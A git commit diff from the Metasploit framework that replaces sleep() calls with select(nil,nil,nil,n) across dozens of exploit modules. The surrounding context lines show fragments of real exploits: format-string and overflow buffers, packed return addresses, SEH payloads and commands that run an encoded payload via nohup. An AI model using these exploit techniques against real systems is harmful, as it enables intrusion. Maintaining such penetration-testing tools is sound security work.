Fixes #2134. Subs select for sleep in exploit modules.
git-svn-id: file:///home/svn/framework3/trunk@9583 4d416f70-5f16-0410-b530-b9f4589650daunstable
Tod Beardsley
parent
2cf9944681
commit
9d46383040
|
|
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sunrpc_call(7, xdr, 2)
|
||||
}
|
||||
|
||||
#print_status("ATTACH DEBUGGER NOW!"); sleep(5)
|
||||
#print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
|
||||
|
||||
buf = rand_text_alphanumeric(payload_space)
|
||||
buf << [brute_target['Ret']].pack('N')
|
||||
|
|
|
|||
|
|
@ -194,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# puts Rex::Text.to_hex_dump("\x04")
|
||||
# dialup_puts("\x04") if len > 0
|
||||
# end
|
||||
sleep 0.5
|
||||
select(nil,nil,nil,0.5)
|
||||
end
|
||||
|
||||
# wait for password prompt
|
||||
|
|
|
|||
|
|
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
connect
|
||||
#print_status("Sleeping, attach now!!")
|
||||
#sleep(5)
|
||||
#select(nil,nil,nil,5)
|
||||
|
||||
sock.put(fmtbuf)
|
||||
|
||||
|
|
|
|||
|
|
@ -228,7 +228,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return if mytarget.name == "Debug"
|
||||
|
||||
#print_status("ATTACH!")
|
||||
#sleep(5)
|
||||
#select(nil,nil,nil,5)
|
||||
|
||||
fmtstr_detect_caps
|
||||
|
||||
|
|
|
|||
|
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
while(true)
|
||||
break if session_created? and datastore['ExitOnSession']
|
||||
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
while true
|
||||
break if session_created? and datastore['ExitOnSession']
|
||||
capture_sendto(pkt, rhost)
|
||||
sleep(datastore['DELAY'])
|
||||
select(nil,nil,nil,datastore['DELAY'])
|
||||
end
|
||||
|
||||
close_pcap
|
||||
|
|
@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect_udp
|
||||
udp_sock.put(sploit)
|
||||
disconnect_udp
|
||||
sleep(datastore['DELAY'])
|
||||
select(nil,nil,nil,datastore['DELAY'])
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -82,15 +82,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Sending hunter")
|
||||
udp_sock.put(sploit)
|
||||
sleep(0.5)
|
||||
select(nil,nil,nil,0.5)
|
||||
|
||||
print_status("Sending payload")
|
||||
udp_sock.put(pkt1 + egg + egg + payload.encoded)
|
||||
sleep(0.5)
|
||||
select(nil,nil,nil,0.5)
|
||||
|
||||
print_status("Calling overflow trigger")
|
||||
udp_sock.put(pkt2)
|
||||
sleep(0.5)
|
||||
select(nil,nil,nil,0.5)
|
||||
|
||||
handler
|
||||
disconnect_udp
|
||||
|
|
|
|||
|
|
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
socket.put(upnp_reply)
|
||||
|
||||
puts "[*] Sleeping to give mDNSDaemonIdle() a chance to run"
|
||||
sleep(10)
|
||||
select(nil,nil,nil,10)
|
||||
|
||||
handler()
|
||||
disconnect_udp()
|
||||
|
|
|
|||
|
|
@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
client.put(header + body)
|
||||
|
||||
print_status("Sleeping...")
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
print_status("Starting handler...")
|
||||
handler(client)
|
||||
|
|
|
|||
|
|
@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock2.close
|
||||
|
||||
print_status("Waiting up to 60 seconds for the payload to execute...")
|
||||
sleep(60)
|
||||
select(nil,nil,nil,60)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
|||
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
else
|
||||
print_status('exploit did not give us an error, this is good...')
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
handler
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -100,11 +100,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(req)
|
||||
sock.get_once
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
|
||||
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
|
||||
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
|||
|
|
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\xff\xf0"
|
||||
|
||||
sock.put(req)
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
|
||||
print_status('Sending username...')
|
||||
|
||||
|
|
@ -96,12 +96,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(req + "\n\n\n")
|
||||
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
sock.get_once
|
||||
|
||||
sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
|
||||
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
|||
|
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
udp_sock.put(buf)
|
||||
|
||||
sleep 2
|
||||
select(nil,nil,nil,2)
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
|
|
|||
|
|
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put(sploit + body + "\r\n\r\n")
|
||||
disconnect
|
||||
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
print_status("Calling payload...")
|
||||
connect
|
||||
req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
|
||||
|
|
|
|||
|
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if (res)
|
||||
print_status("The server returned: #{res.code} #{res.message}")
|
||||
print_status("Waiting on the payload to execute...")
|
||||
sleep(20)
|
||||
select(nil,nil,nil,20)
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
|
|
|
|||
|
|
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put(payload.encoded)
|
||||
|
||||
print_status("Waiting for the payload to execute...")
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -277,7 +277,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
begin
|
||||
ret = sunrpc_call(0xf5, request)
|
||||
sleep(20)
|
||||
select(nil,nil,nil,20)
|
||||
rescue
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
disconnect
|
||||
|
||||
# Give the process time to recover from each exception
|
||||
sleep(0.1);
|
||||
select(nil,nil,nil,0.1);
|
||||
}
|
||||
|
||||
handler
|
||||
|
|
|
|||
|
|
@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Sleeping (giving exception handler time to recover)")
|
||||
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
}
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -73,12 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
connect
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
sploit = "\xeb\x29"
|
||||
sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
|
||||
sploit << "@@@@@@@@" + payload.encoded
|
||||
sock.put(sploit + "\r\n")
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
|
|||
|
|
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true )
|
||||
print_status(res.strip) if res
|
||||
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name}...")
|
||||
|
||||
send_cmd(['SIZE', sploit], false)
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
uri << "B" * 0xD0
|
||||
|
||||
res = c.send_request(c.request_raw({ 'uri' => uri }))
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name}...")
|
||||
sock.put(req)
|
||||
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
|
|||
|
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put(res)
|
||||
|
||||
#give wahttp.exe a bit to recover...
|
||||
sleep 2
|
||||
select(nil,nil,nil,2)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}, 5)
|
||||
|
||||
print_status("Overflow request sent, sleeping for four seconds")
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
1.upto(8) { |i|
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
return if self.session_created?
|
||||
}
|
||||
|
||||
|
|
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_request_raw({'uri' => '/'}, 5)
|
||||
rescue
|
||||
print_status("Connection failed (#{i} of 20)...")
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
next
|
||||
end
|
||||
return true
|
||||
|
|
|
|||
|
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once
|
||||
|
||||
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sock.put(sploit)
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
handler
|
||||
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => pst
|
||||
}, 5)
|
||||
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sock.puts(sploit)
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
sock.put(sploit)
|
||||
sleep(3) # =(
|
||||
select(nil,nil,nil,3) # =(
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
print_status("Attempting to trigger memory overwrite by reconnecting...")
|
||||
|
||||
|
|
|
|||
|
|
@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
|
||||
|
|
|
|||
|
|
@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
|
||||
|
|
|
|||
|
|
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
|
||||
#sleep(4)
|
||||
#select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
|
||||
|
|
|
|||
|
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name}...")
|
||||
sock.put(sploit)
|
||||
|
||||
sleep(3) # =(
|
||||
select(nil,nil,nil,3) # =(
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
|
||||
|
|
|
|||
|
|
@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
|
||||
|
|
|
|||
|
|
@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
|
||||
|
|
|
|||
|
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def on_client_data(client)
|
||||
client.get_once
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
sploit = ":" + Rex::Text.rand_text_alphanumeric(307) + [target['Rets'][0]].pack('V') + [target['Rets'][1]].pack('V')
|
||||
sploit << make_nops(4) + [target['Rets'][2]].pack('V') + make_nops(4) + "B" * 12
|
||||
sploit << Rex::Arch::X86.jmp_short(3) +Rex::Text.rand_text_alphanumeric(2)
|
||||
|
|
|
|||
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
sock.put(sploit)
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -85,29 +85,29 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Connecting to #{rhost} on port #{rport}...")
|
||||
|
||||
sock.put(pkt1)
|
||||
sleep(0.15)
|
||||
select(nil,nil,nil,0.15)
|
||||
|
||||
sock.put("\xFF")
|
||||
sleep(0.15)
|
||||
select(nil,nil,nil,0.15)
|
||||
|
||||
sock.put(pkt3)
|
||||
sleep(0.15)
|
||||
select(nil,nil,nil,0.15)
|
||||
|
||||
sock.put("\xF9\x00")
|
||||
sleep(0.15)
|
||||
select(nil,nil,nil,0.15)
|
||||
|
||||
print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...")
|
||||
sock.put("\xF8" + [data.length].pack('n') + data)
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
|
||||
sock.put("\xF7")
|
||||
sleep(0.15)
|
||||
select(nil,nil,nil,0.15)
|
||||
|
||||
sock.put("\xFA")
|
||||
sleep(0.15)
|
||||
select(nil,nil,nil,0.15)
|
||||
|
||||
sock.put("\xFE")
|
||||
sleep(0.08)
|
||||
select(nil,nil,nil,0.08)
|
||||
|
||||
print_status("Done!")
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
client.put(res)
|
||||
handler(client)
|
||||
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
service.close_client(client)
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
||||
|
||||
print_status("Overflow request sent, sleeping for four seconds")
|
||||
sleep(4)
|
||||
select(nil,nil,nil,4)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put("AUTH CRAM-MD5\r\n")
|
||||
|
||||
sock.get_once
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
|
||||
buffer = rand_text_alpha_upper(204) + [target.ret].pack('V')
|
||||
buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)
|
||||
|
|
|
|||
|
|
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Exploit attempt ##{count}")
|
||||
|
||||
connect
|
||||
sleep(1)
|
||||
select(nil,nil,nil,1)
|
||||
banner = sock.get_once
|
||||
print_status("Connected to SMTP server: #{banner.to_s}")
|
||||
|
||||
|
|
@ -118,9 +118,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
sock.put("EHLO X\r\n")
|
||||
sleep(7)
|
||||
select(nil,nil,nil,7)
|
||||
res = sock.get_once
|
||||
|
||||
if (res !~ /XEXCH50/)
|
||||
|
|
@ -129,10 +129,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
|
||||
sleep(3)
|
||||
select(nil,nil,nil,3)
|
||||
|
||||
sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
|
||||
sleep(3)
|
||||
select(nil,nil,nil,3)
|
||||
|
||||
end
|
||||
|
||||
|
|
@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
sock.put("XEXCH50 2 2\r\n")
|
||||
sleep(3)
|
||||
select(nil,nil,nil,3)
|
||||
res = sock.get(-1,3)
|
||||
print_status("#{res}")
|
||||
if (res !~ /Send binary data/)
|
||||
|
|
@ -172,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
size = 1024 * 1024 * 32
|
||||
|
||||
sock.put("XEXCH50 #{size} 2\r\n")
|
||||
sleep(3)
|
||||
select(nil,nil,nil,3)
|
||||
|
||||
sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"
|
||||
|
||||
|
|
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
smtp_setup(count) # Connection 2
|
||||
|
||||
sock.put("XEXCH50 -1 2\r\n") # Allocate negative value
|
||||
sleep(2)
|
||||
select(nil,nil,nil,2)
|
||||
res = sock.get_once
|
||||
|
||||
if (!res)
|
||||
|
|
|
|||
|
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
connect
|
||||
print_status("Attempting to determine if target is vulnerable...")
|
||||
sleep(7)
|
||||
select(nil,nil,nil,7)
|
||||
banner = sock.get_once(-1,3)
|
||||
|
||||
if (banner =~ /TelSrv 1\.5/)
|
||||
|
|
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
|
||||
connect
|
||||
print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
|
||||
sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.
|
||||
select(nil,nil,nil,7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.
|
||||
|
||||
username = rand_text_english(20000, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
|
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
|
||||
sock.put(username)
|
||||
sleep(0.25)
|
||||
select(nil,nil,nil,0.25)
|
||||
print_status('Exploit sent...')
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
|||
|
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Trying target #{target.name}...")
|
||||
udp_sock.put(sploit)
|
||||
|
||||
sleep(5)
|
||||
select(nil,nil,nil,5)
|
||||
handler
|
||||
disconnect_udp
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue